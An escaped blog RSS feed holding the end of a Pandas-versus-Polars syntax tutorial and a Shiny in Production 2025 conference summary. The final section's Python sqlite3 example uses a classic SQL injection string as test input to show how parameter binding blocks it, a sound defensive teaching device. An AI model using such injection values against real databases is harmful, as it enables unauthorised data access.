&lt;h3 id="polars"&gt;Polars&lt;/h3&gt;
&lt;p&gt;We will repeat the above, but using syntax typical for the Polars package.&lt;/p&gt;
&lt;p&gt;The syntax for subsetting the rows of a data-frame is different in Polars.
Passing a Boolean data-mask, &lt;code&gt;pollinators[pollinators[&amp;quot;order&amp;quot;] == &amp;quot;Hymenoptera&amp;quot;]&lt;/code&gt;, doesn&amp;rsquo;t work
in Polars and the printed error will recommend you use the &lt;code&gt;.filter()&lt;/code&gt; method instead:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bees &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pollinators
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;filter(pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;col(&lt;span style="color:#a5d6ff"&gt;&amp;#34;order&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hymenoptera&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Inside a data-frame method (like &lt;code&gt;.filter()&lt;/code&gt;) we can refer to a column using
&lt;code&gt;pl.col(&amp;quot;column_name&amp;quot;)&lt;/code&gt;. In Pandas,
&lt;code&gt;pollinators[&amp;quot;order&amp;quot;] == &amp;quot;Hymenoptera&amp;quot;&lt;/code&gt; returns a Series of Boolean values that can be used to
index into the rows of a data-frame; this logical series is a &amp;ldquo;data-mask&amp;rdquo;, and it has to be
computed on a concrete data-frame. With &lt;code&gt;pl.col()&lt;/code&gt; we don&amp;rsquo;t have to precompute a data-mask:
the expression implicitly refers to a column in the current state of the data-frame, so we
can chain filtering steps together.&lt;/p&gt;
&lt;p&gt;The syntax for grouping and summarising data is similar to the Pandas syntax but, again, we can
refer to columns using &lt;code&gt;pl.col()&lt;/code&gt;. By providing named arguments to &lt;code&gt;.agg()&lt;/code&gt; the names of the
output columns can be defined in a single step.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bee_counts &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bees
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;group_by([&lt;span style="color:#a5d6ff"&gt;&amp;#34;sample_id&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;agg(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; n_insects &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;col(&lt;span style="color:#a5d6ff"&gt;&amp;#34;count&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sum(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; n_species &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;col(&lt;span style="color:#a5d6ff"&gt;&amp;#34;taxon_standardised&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;unique()&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;len()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="pandas-3"&gt;Pandas 3&lt;/h3&gt;
&lt;p&gt;Pandas 3.0 is introducing a
&lt;a href="https://pandas.pydata.org/docs/dev/whatsnew/v3.0.0.html#pd-col-syntax-can-now-be-used-in-dataframe-assign-and-dataframe-loc" rel="external"&gt;new syntax&lt;/a&gt;
that can be used for filtering rows, or adding new columns.
It is closely related to the Polars &lt;code&gt;pl.col()&lt;/code&gt; syntax. For example, filtering to keep only the
&amp;ldquo;Hymenoptera&amp;rdquo; in the pollinators dataset can be performed using the following code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Pandas 3.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pollinators &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(&lt;span style="color:#ff7b72;font-weight:bold"&gt;....&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bees &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pollinators&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loc[pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;col(&lt;span style="color:#a5d6ff"&gt;&amp;#34;order&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hymenoptera&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The new part of this syntax is the use of &lt;code&gt;pd.col()&lt;/code&gt;. The &lt;code&gt;.loc[]&lt;/code&gt; indexer is already available in
Pandas 2, where we can pass an anonymous function to select the required rows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Pandas 2 or 3.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bees &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pollinators&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loc[&lt;span style="color:#ff7b72"&gt;lambda&lt;/span&gt; x: x[&lt;span style="color:#a5d6ff"&gt;&amp;#34;order&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hymenoptera&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;In this blog post we have shown the similarities and differences between Pandas and Polars syntax
for typical data-manipulation tasks. There are some fundamental differences between Pandas and
Polars that go deeper than the syntactic things covered here (and we&amp;rsquo;ve really only scratched the
surface of those differences). Polars is implemented in Rust, whereas Pandas is written in Python
on top of NumPy&amp;rsquo;s C code base. The speed of Polars and Pandas can differ on the same tasks as a
result of the different implementations. Processing speed is occasionally a good reason to choose
one package over another. But if you are considering migrating from Pandas to Polars, you have to
accept that your team will all need onboarding to the Polars syntax. From what we&amp;rsquo;ve seen here,
the differences between Pandas and Polars syntax aren&amp;rsquo;t that great; the methods have similar names, for
example. In fact, from discussing the two packages with data scientists, we have found that it is
the Polars syntax, rather than its speed, that has led some to migrate away from Pandas.&lt;/p&gt;
&lt;h2 id="data-citation"&gt;Data Citation&lt;/h2&gt;
&lt;p&gt;UK Pollinator Monitoring Scheme (2025). Pan trap survey data from the UK Pollinator Monitoring
Scheme, 2017-2022. NERC EDS Environmental Information Data Centre.
&lt;a href="https://doi.org/10.5285/4a565007-d3a1-468d-9f84-70ec7594fafe"&gt;https://doi.org/10.5285/4a565007-d3a1-468d-9f84-70ec7594fafe&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The UK Pollinator Monitoring Scheme (UK PoMS) is a partnership funded jointly by the UK Centre for
Ecology &amp;amp; Hydrology (UKCEH) and Joint Nature Conservation Committee (JNCC) (through funding from the
Department for Environment, Food &amp;amp; Rural Affairs, Scottish Government, Welsh Government and
Department of Agriculture, Environment and Rural Affairs for Northern Ireland). UKCEH’s contribution
is part-funded by the Natural Environment Research Council formerly as part of the UK-SCAPE
programme (award NE/R016429/1) and now as part of the NC-UK programme (award NE/Y006208/1)
delivering National Capability. Between 2017 and 2021, PoMS was funded by UKCEH and Defra (England),
Welsh Government, Scottish Government, DAERA (Northern Ireland), and JNCC. PoMS is indebted to the
many volunteers who carry out surveys and contribute data to the scheme.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-df-syntax/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Highlights from Shiny in Production (2025)</title><link>https://www.jumpingrivers.com/blog/sip2025-shiny-conference-summary/</link><pubDate>Mon, 03 Nov 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sip2025-shiny-conference-summary/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sip2025-shiny-conference-summary/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sip2025-shiny-conference-summary/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This October, Jumping Rivers hosted the fourth installment of our conference &amp;ldquo;Shiny In Production&amp;rdquo;.
This year, speakers from around the world joined us in Newcastle to see how Shiny, in both Python
and R, has solved real data problems for them.&lt;/p&gt;
&lt;h2 id="workshops"&gt;Workshops&lt;/h2&gt;
&lt;p&gt;An important part of &amp;ldquo;Shiny In Production&amp;rdquo; is the afternoon of hands-on workshops.
Whether you want your app to look nice, behave correctly, or treat all your users fairly, there was
something for you. If only we could attend all of the workshops in parallel, too&amp;hellip;&lt;/p&gt;
&lt;h3 id="colin-fay---"&gt;Colin Fay - &lt;a href="https://connect.thinkr.fr/2025-shinyinprod-pw/" rel="external"&gt;&amp;ldquo;Production-Proof Shiny - End-to-end testing with Playwright and {golem}&amp;rdquo;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Colin Fay from &lt;a href="https://thinkr.fr/" rel="external"&gt;ThinkR&lt;/a&gt; presented a workshop on &amp;ldquo;Playwright&amp;rdquo;, the now industry-standard
tool for end-to-end testing. Playwright can be used against any browser-based
application, so by learning this tool our attendees could go away and test apps whether they are
written with Shiny in R or Python, or using any other dashboard framework.&lt;/p&gt;
&lt;h3 id="russ-hyde---asynchronous-shiny"&gt;Russ Hyde - &amp;ldquo;Asynchronous Shiny&amp;rdquo;&lt;/h3&gt;
&lt;!-- Russ apologises to the rest of JR for the following daftness --&gt;
&lt;p&gt;Poor Shiny.
13 years old is practically middle-aged for a web framework, and like many a tech wunderkind, it&amp;rsquo;s
decided that it&amp;rsquo;s time for a change.
Here at Jumping Rivers, we wish Shiny great success as it embarks on a new life as a chef.
But as it juggles the multiple orders that come in, and the many different recipes on the menu,
Chef Shiny has realised that its years training on the futures, promises, and ExtendedTasks of the
data world were the perfect apprenticeship for this brave leap.&lt;/p&gt;
&lt;p&gt;Russ, one of our Data Scientists at Jumping Rivers, explained to our workshop attendees how to
work with asynchronous programming in R, and how Shiny can make use of this approach to build apps
that can serve multiple users without blocking.&lt;/p&gt;
&lt;h3 id="pedro-silva---figma-and-user-interface-design"&gt;Pedro Silva - &amp;ldquo;Figma and User-Interface Design&amp;rdquo;&lt;/h3&gt;
&lt;p&gt;Yes Shiny, you &lt;em&gt;are&lt;/em&gt; beautiful, but are you really pairing that typeface with those buttons?&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.figma.com/" rel="external"&gt;Figma&lt;/a&gt;, like Playwright above, is another widely-used tool from the wider
world of web development. It can be used to create user interface designs in collaboration with
clients and colleagues.&lt;/p&gt;
&lt;p&gt;Our Data Scientist Pedro Silva, ably-assisted by Tim Brock and Keith Newman, treated the workshop
attendees to an introductory session on Figma. They worked through hands-on exercises to design
components of an app and saw how thinking about the user-interface design from outside of your
normal IDE can help when you are building applications in Shiny.&lt;/p&gt;
&lt;h2 id="talks"&gt;Talks&lt;/h2&gt;
&lt;p&gt;On Day 2 we enjoyed talks from some fabulous speakers across a range of industries!&lt;/p&gt;
&lt;h3 id="colin-fay----1"&gt;Colin Fay - &lt;a href="https://speakerdeck.com/colinfay/after-shiny-the-future-of-mobile-apps-with-r" rel="external"&gt;&amp;ldquo;After {shiny} — Bringing R to Mobile with webR&amp;rdquo;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;R evolved from a command-line tool to include GUIs and IDEs. In 2012, Shiny emerged, enabling web app development purely in R, connecting statisticians with users.
However, mobile usage wasn&amp;rsquo;t prioritised initially.&lt;/p&gt;
&lt;p&gt;As mobile devices became ubiquitous, new requirements arose. Shiny&amp;rsquo;s mobile approaches proved limited, leading to the development of {shinymobile}.
Despite improvements, it still required internet connectivity, couldn&amp;rsquo;t be distributed through app stores, and lacked access to native phone APIs.&lt;/p&gt;
&lt;p&gt;To address these limitations, the team developed {R-linguo}, a proof-of-concept native app using webR. It offers offline functionality,
native performance, mobile-friendly UX, native API access, and app store distribution.&lt;/p&gt;
&lt;p&gt;The way the app works is by loading a JavaScript runtime, which loads webR, which then loads R functions as R object proxies that JavaScript can call.&lt;/p&gt;
&lt;p&gt;This innovation serves scientists in remote areas, students, and educators who need offline R capabilities beyond what Shiny apps can provide.&lt;/p&gt;
&lt;h3 id="charlie-gao---"&gt;Charlie Gao - &lt;a href="https://shikokuchuo.net/sip2025" rel="external"&gt;&amp;ldquo;Advances in the Shiny Ecosystem&amp;rdquo;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;This talk explores two key advances in the Shiny ecosystem: async programming and OpenTelemetry tracing.&lt;/p&gt;
&lt;p&gt;The async section focuses on Promises and the mirai package. Mirai offers a modern foundation with NNG, IPC/TCP/secure TLS support, and cross-language
data formats like Arrow. It delivers extreme performance, scaling to millions of tasks, with a production-first approach featuring 100% reliable
evaluation and minimal complexity. It deploys everywhere, from local to remote systems and clusters including Slurm, SGE, LSF, and PBS.&lt;/p&gt;
&lt;p&gt;OpenTelemetry provides observability at scale through distributed tracing across services, databases, and API gateways. It enables performance
optimisation by reducing span length and nesting, real-time error detection, centralised monitoring across processes and machines, and production monitoring.
Implementation requires installing {otel} and {otelsdk} packages and configuring environment variables.&lt;/p&gt;
&lt;p&gt;The recommended performance workflow involves enabling OpenTelemetry to identify slow spans, using profvis for detailed analysis, then
optimising through moving work outside Shiny servers, improving code efficiency, implementing caching, and sometimes utilising non-blocking
reactivity.&lt;/p&gt;
&lt;h3 id="colin-gillespie---validating-shiny-apps-in-regulated-environments"&gt;Colin Gillespie - &amp;ldquo;Validating Shiny Apps in Regulated Environments&amp;rdquo;&lt;/h3&gt;
&lt;p&gt;Colin explored how to validate Shiny apps and what makes them trustworthy.
Using audience input, he concluded that professional Shiny apps need tests,
documentation, and a good user experience.&lt;/p&gt;
&lt;p&gt;He covered the Jumping Rivers &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmusverse&lt;/a&gt; suite,
which validates R packages,
and explained that Shiny apps are harder to validate due to user interaction and
variable outputs. Combining Litmus tools with Shiny-specific assessments can produce a validation score.&lt;/p&gt;
&lt;p&gt;Colin also covered challenges such as logging user actions, validating downloads,
and restricting inputs. He stressed using {renv} or Docker to manage environments,
performing end-to-end testing, and separating logic from the app for easier testing.
The talk ended with best practices around documentation, validation, workflows, and automation.&lt;/p&gt;
&lt;h3 id="jack-anderson---transforming-the-reporting-of-national-patient-outcomes-with-shiny"&gt;Jack Anderson - &lt;a href="https://digital.nhs.uk/ndrs/data/data-outputs/cancer-data-hub/30-day-mortality-after-sact" rel="external"&gt;&amp;ldquo;Transforming the reporting of national patient outcomes with Shiny&amp;rdquo;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The Shiny era may be in full swing, but our battle against inadequate Excel spreadsheets rages on.&lt;/p&gt;
&lt;p&gt;The National Disease Registration Service (NDRS) reports 30-day mortality post-Systemic Anti-Cancer Therapy (SACT) Case-Mix Adjusted Rates (CMAR) to NHS trusts in England each year.
For the first three years, these were shared as Excel files with an accompanying pair of instructions in PDF files.
But this leaves you with a number of problems, such as time-consuming admin to prepare and email the results to over 350 trusts around the country, and limited capacity for &lt;abbr title="quality assurance"&gt;QA&lt;/abbr&gt; checks.&lt;/p&gt;
&lt;p&gt;Replacing this system with a Shiny alternative provided a more intuitive user interface, plots that now make sense when copied into external reports, and the ability for trusts to easily compare against neighbouring regions.
Jack guides us through the many benefits&amp;mdash;not just for the end-user&amp;mdash;but also the &lt;abbr title="National Disease Registration Service"&gt;NDRS&lt;/abbr&gt; benefitting from drastically reduced admin requirements in publishing results each year.&lt;/p&gt;
&lt;p&gt;Spurred on from the success of this application, the &lt;abbr title="National Disease Registration Service"&gt;NDRS&lt;/abbr&gt; now has a custom Shiny starter template to support the creation of future Shiny applications among the team.&lt;/p&gt;
&lt;h3 id="gabriella-de-lima-marin---a-collaborative-initiative-for-mapping-and-georeferencing-public-schools-in-brazil"&gt;Gabriela De Lima Marin - &lt;a href="https://gabrielamarin.quarto.pub/shiny-in-production/" rel="external"&gt;&amp;ldquo;A collaborative initiative for mapping and georeferencing public schools in Brazil&amp;rdquo;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;With a goal of identifying digital inequality around Brazil, Gabriela lays out the problem of ensuring schools across Brazil can get a good connection to &lt;a href="https://medicoes.nic.br" rel="external"&gt;fibre internet networks&lt;/a&gt;.
But that can be difficult when 3 in every 10 schools on the list have no geolocation data.
It&amp;rsquo;s even worse when some schools with location data have coordinates that lie in the ocean.&lt;/p&gt;
&lt;p&gt;Pulling in data from other sources&amp;mdash;such as Google and OpenStreetMap&amp;mdash;can help,
but even these sources can be missing data or have incorrect entries.
So why not allow locals to provide the missing pieces of the puzzle?
Gabriela takes us through the creation of a &lt;a href="https://api.simet.nic.br/geo-escolas/" rel="external"&gt;Shiny application&lt;/a&gt; containing a {leaflet} map, where users can submit location data for schools.&lt;/p&gt;
&lt;p&gt;There are of course challenges which Gabriela had to face: How do you decide which data source to trust?
How do you decide who submitted the most accurate location marker?
Challenges aside, this remains a cost-effective way to collect the vital information from those with local knowledge.
And with this information, you can make impactful improvements to educational services across Brazil.&lt;/p&gt;
&lt;h3 id="cam-race---shinygovstyle-a-shiny-secret-weapon-for-production-ready-government-public-services"&gt;Cam Race - &lt;a href="https://drive.google.com/file/d/1hCbMEZjxq_hoSBWXomj9bw1p_WSQ9Nxx/view?usp=sharing" rel="external"&gt;&amp;ldquo;shinyGovstyle: A &amp;lsquo;Shiny&amp;rsquo; Secret Weapon for Production-Ready Government Public Services&amp;rdquo;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The vast majority of UK government service websites use the &lt;a href="https://design-system.service.gov.uk/" rel="external"&gt;GOV.UK Design System&lt;/a&gt;&amp;mdash;an &lt;a href="https://www.gov.uk/government/news/govuk-wins-design-of-the-year-2013" rel="external"&gt;award-winning&lt;/a&gt; framework for consistent styling and components on websites.&lt;/p&gt;
&lt;p&gt;Cam showcased {shinyGovstyle}, an R package that applies the &lt;a href="https://github.com/dfe-analytical-services/shinyGovstyle/" rel="external"&gt;GOV.UK design system&lt;/a&gt; on your Shiny app,
and explained the benefits of having a consistent theming package for your applications.
While the biggest effect from the package is to apply the standardised CSS to the application, additional functions are added to provide more accessible formats to hyperlinks and widgets.
This means some of the styling requirements needed to meet WCAG 2.2 AA are handled automatically, which is a legal requirement for UK government web services to meet.
But as Cam points out, while a surprisingly large percentage of users will have some form of accessibility needs, improved accessibility benefits everyone.&lt;/p&gt;
&lt;p&gt;Thanks to this common design system in a package, it&amp;rsquo;s much easier for developers to have their Shiny applications accepted for publication on government sites.&lt;/p&gt;
&lt;h3 id="laura-mawer---duck-duck--dashboardduck-duck-dashboard-videomp4"&gt;Laura Mawer - &amp;ldquo;Duck, Duck, &amp;hellip;, Dashboard&amp;rdquo;&lt;/h3&gt;
&lt;p&gt;I write this while seeking cover. As Laura pelts another questioner with rubber ducks, I&amp;rsquo;ll try to
summarise her talk&amp;hellip;&lt;/p&gt;
&lt;p&gt;The second Shiny app that Laura (from &lt;a href="https://datacove.co.uk/" rel="external"&gt;Datacove&lt;/a&gt;) ever built, shows off
some super cool stuff. Interactive graphics of duck-related data are one thing. But the artificial
intelligence embedded in this app was awesome.&lt;/p&gt;
&lt;p&gt;If you haven&amp;rsquo;t seen the
&lt;a href="https://shiny.posit.co/py/docs/genai-inspiration.html" rel="external"&gt;AI tutorials for &amp;ldquo;Shiny for Python&amp;rdquo;&lt;/a&gt;
that Posit have written, they are strongly recommended. But you need a good idea before including
AI in an app. Here, Laura included a text-query box that allows users to ask questions about the
dataset that is presented in the app. You can ask questions about ducks in general, or about the
dataset itself. The idea worked really well.&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s right. Her second ever app&amp;hellip;&lt;/p&gt;
&lt;p&gt;If you are learning Data Science in Python, Laura hosts a YouTube series
&lt;a href="https://www.youtube.com/playlist?list=PLyRG_Y8ORUtf5IDO3RYDSHEvAtrhvAy06" rel="external"&gt;&amp;ldquo;Pretty Powerful Pandas&amp;rdquo;&lt;/a&gt;.
Hopefully she won&amp;rsquo;t be throwing pandas at us next time&amp;hellip;&lt;/p&gt;
&lt;h3 id="nic-crane--charlotte-hadley---htmlwidgets-are-a-secret-sauce-in-r---can-llms-make-them-the-perfect-condiment"&gt;Nic Crane &amp;amp; Charlotte Hadley - &amp;ldquo;htmlwidgets are a secret sauce in R - can LLMs make them the perfect condiment?&amp;rdquo;&lt;/h3&gt;
&lt;p&gt;The final talk of the day was a duet. If you blend one htmlwidgets enthusiast, and one LLM
enthusiast, this interactive session is the result.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.htmlwidgets.org/" rel="external"&gt;{htmlwidgets}&lt;/a&gt; powers much of the connection between R and JavaScript
widgets. Think DT, leaflet, plotly and profvis: their use in R and Shiny is held together by
htmlwidgets. Many of the audience have made use of these tools at one time or another.
It&amp;rsquo;s much less common to meet someone who has created an htmlwidget-based package that wraps up
a JavaScript library for use in R.&lt;/p&gt;
&lt;p&gt;This talk by Nic and Charlotte showed us how simple it is to make an htmlwidget.&lt;/p&gt;
&lt;p&gt;But it didn&amp;rsquo;t just do that. There are already tutorials and books that can explain that process.
Here, they showed us how simple it is to get GitHub Copilot to make an htmlwidget. Using prompts
in VS Code, they built an initial widget and then refined it repeatedly with further prompting,
until the resulting R code could create a timeline from an input data-frame.&lt;/p&gt;
&lt;p&gt;Sure, a bit of manual tweaking was required to polish the code, but the package created
by Copilot was usable. It still takes an expert like Nic or Charlotte to temper some of the
decisions made by code-generating tools.&lt;/p&gt;
&lt;h2 id="lightning-talks"&gt;Lightning Talks&lt;/h2&gt;
&lt;p&gt;As with last year, the lightning talks had the added challenge of slides auto-advancing after 10 seconds each!
We also held a vote for the best talk, with the prize being a £100 book voucher donated by CRC Press. David Carayon
from INRAE claimed the prize, avenging his second-place finish last year!&lt;/p&gt;
&lt;h3 id="david-carayon---"&gt;David Carayon - &lt;a href="https://hal.inrae.fr/hal-05312032" rel="external"&gt;&amp;ldquo;Rescuelog: a Shiny-Based Monitoring System for Lifeguards: Insights from Southwest France&amp;rdquo;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;David started by showing the beautiful beaches of south-west France, with the caveat that they are some
of the most dangerous in the world, with thousands of rescues per year. He then outlined his project equipping
lifeguards with tools and knowledge for reporting these rescues, allowing the collection of data to be
used in a predictive analytics Shiny app. The project has been a great success with over 15,000 submissions each
year and over 80 beaches signed up.&lt;/p&gt;
&lt;h3 id="rhian-davies---"&gt;Rhian Davies - &lt;a href="https://rhian.rbind.io/talks/2025-10-09-accidental-engineers/" rel="external"&gt;&amp;ldquo;The Accidental Engineers: Managing Shiny Apps, Pipelines, and Tech Debt in the NHS&amp;rdquo;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Rhian started by outlining the challenge of hospital planning, in terms of variables impacting demand like
population growth, patient expectations or waiting lists. She then presented a project using Shiny to explore
outputs from a Python model.&lt;/p&gt;
&lt;p&gt;She then described the struggle of losing a core member of the team and of the app going into production. This resulted in
a huge surge in demand for the developers&amp;rsquo; time, with bugs and feature requests flying in. They have developed
a mechanism to treat the model like a software project, with sprints including development, quality assurance and
launch. She finished by detailing some of the best practices they&amp;rsquo;ve implemented and important lessons learnt.&lt;/p&gt;
&lt;h3 id="andrie-de-vries---working-with-inforsec-to-get-to-production"&gt;Andrie de Vries - &amp;ldquo;Working with Infosec to get to production&amp;rdquo;&lt;/h3&gt;
&lt;p&gt;Andrie spoke about the importance of the three pillars of Infosec: availability,
integrity and confidentiality. He also covered the risks of data leakage, not testing adequately and
exposure to the LLM provider. He moved on to some solutions to these problems, like authorisation,
data security and scoped permissions.&lt;/p&gt;
&lt;h3 id="russ-hyde---discoverability-and-the-data-product"&gt;Russ Hyde - &amp;ldquo;Discoverability and the Data Product&amp;rdquo;&lt;/h3&gt;
&lt;p&gt;Our own Russ Hyde spoke about the importance of making tools and apps discoverable, which is often
an overlooked part of development. Moving on to Shiny apps specifically, there are aspects of metadata you can
add, like descriptions, tags and documentation.&lt;/p&gt;
&lt;p&gt;Russ spoke about helping users by making it easy to find and use products and contact developers. He pointed
to the Jumping Rivers &lt;a href="https://www.jumpingrivers.com/data-science/gallery/" rel="external"&gt;dashboard gallery&lt;/a&gt;, with some helpful examples of features you can include in Shiny
dashboards.&lt;/p&gt;
&lt;h3 id="kia-mack--euan-mckenzie---building-the-kent-bng-register-shiny-for-ui-first-development-in-a-small-charity-tech-team"&gt;Kia Mack &amp;amp; Euan McKenzie - &amp;ldquo;Building the Kent BNG Register: Shiny for UI-First Development in a Small Charity Tech Team&amp;rdquo;&lt;/h3&gt;
&lt;p&gt;Kia started off with a brief background on something called Biodiversity Net Gain, a government initiative where
land developers have to increase biodiversity and a popular way of doing this is by buying biodiversity credits.
The Kent Wildlife Trust wanted a way to add visibility to local habitat banks (where the credits can be purchased)
to ensure that local developers are investing in local biodiversity. She introduced the Shiny app that they had
designed for land developers to see what listings are available from habitat banks and enquire with them.&lt;/p&gt;
&lt;p&gt;Euan then detailed the tools used within the app, like bs4Dash for the layout, leaflet for the open source maps
and DT for interactive tables. He also spoke about the auth0 package for in-app authentication, with email verification.
Having a secure database was a key part of the project so they used the glue_sql and inputValidator functions
to prevent SQL injection by sanitising queries. The Golem framework was also very helpful for structuring the app
and allowed them to create a separate R package containing the business logic with tests.&lt;/p&gt;
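&lt;p&gt;The app in the talk is written in R, but the underlying idea of keeping user input out of the SQL text can be sketched in Python with the standard-library &lt;code&gt;sqlite3&lt;/code&gt; module. The table, the column names and the &lt;code&gt;find_listings()&lt;/code&gt; helper are hypothetical, and placeholder binding is a comparable technique rather than a description of how &lt;code&gt;glue_sql&lt;/code&gt; works internally.&lt;/p&gt;

```python
import sqlite3

# Hypothetical in-memory table standing in for a register of habitat listings.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE listings (id INTEGER PRIMARY KEY, habitat TEXT)")
conn.executemany(
    "INSERT INTO listings (habitat) VALUES (?)",
    [("grassland",), ("woodland",)],
)


def find_listings(connection, habitat):
    """Return listings for one habitat, binding the user input as a parameter."""
    # The ? placeholder makes the driver treat habitat as data, never as SQL text.
    cursor = connection.execute(
        "SELECT id, habitat FROM listings WHERE habitat = ?",
        (habitat,),
    )
    return cursor.fetchall()


safe_rows = find_listings(conn, "woodland")
# A classic injection attempt is matched as a literal string and finds nothing.
attack_rows = find_listings(conn, "woodland' OR '1'='1")
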